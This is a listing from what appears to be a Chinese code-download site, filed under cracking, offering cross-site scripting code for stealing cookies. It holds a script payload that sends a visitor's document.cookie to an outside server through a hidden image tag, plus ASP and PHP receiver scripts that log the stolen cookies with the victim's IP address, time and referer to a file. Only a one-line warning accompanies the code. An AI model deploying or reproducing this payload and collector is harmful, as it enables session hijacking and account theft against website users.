XSS偷cookie的代码.txt
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:1k
源码类别:

破解

开发平台:

ASP/ASPX

  1. <script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>
  2. news.asp代码:
  3. <%
  4. msg=Request.ServerVariables("QUERY_STRING")    
  5. testfile=Server.MapPath("cook.txt")    
  6. set fs=server.CreateObject("scripting.filesystemobject")    
  7. set thisfile=fs.OpenTextFile(testfile,8,True,0)    
  8. thisfile.Writeline(""&msg& "")    
  9. thisfile.close    
  10. set fs = nothing    
  11. %>
  12. PHP版代码:
  13. <?php 
  14. $cookie = $_GET['c']; 
  15. $ip = getenv ('REMOTE_ADDR'); 
  16. $time=date("j F, Y, g:i a"); 
  17. $referer=getenv ('HTTP_REFERER'); 
  18. $fp = fopen('cook.txt', 'a'); 
  19. fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>'); 
  20. fclose($fp); 
  21. ?>
  22. 注意:最近警惕XX攻击。